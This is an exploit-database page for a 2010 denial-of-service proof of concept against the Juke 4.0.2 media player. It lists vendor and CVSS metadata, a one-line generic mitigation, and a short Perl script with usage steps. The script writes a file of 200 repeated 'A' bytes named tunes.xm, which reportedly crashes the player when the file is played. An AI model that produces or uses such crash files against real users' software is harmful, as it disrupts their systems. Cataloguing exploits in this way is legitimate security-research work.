header-logo
Suggest Exploit
vendor:
Juke
by:
anonymous
7,5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Juke
Affected Version From: 4.0.2
Affected Version To: 4.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:wolosoft:juke
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Juke 4.0.2 DoS Multiple Files

Juke will Crash when you run this script to make a file with any of the following extensions .xm .nst .s3m .stm .mod. Usage: Run Script -> Add file with + -> Press Play

Mitigation:

Ensure that the application is not vulnerable to DoS attacks by validating user input and implementing rate limiting.
Source

Exploit-DB raw data:

# Exploit Title: Juke 4.0.2 DoS Multiple Files 
# Date: April 6, 2010
# Software Link: [http://www.wolosoft.com/en/download.html]
# Version: 4.0.2
# Tested on: Windows XP SP3
# Author: [anonymous]
#
# Juke will Crash when you run this script to make 
# a file with any of the following extensions
# .xm .nst .s3m .stm .mod
#
# Usage: Run Script -> Add file with + -> Press Play
#!/usr/bin/perl

my $music = "tunes.xm";
my $mic = "\x41" x 200;
 
print "Creating File . . .\n";
sleep(1);

open (FILE, ">$music");
print FILE "$mic";
close FILE;

print "\nIt's a mix between Jazz and Funk, it's called Junk!";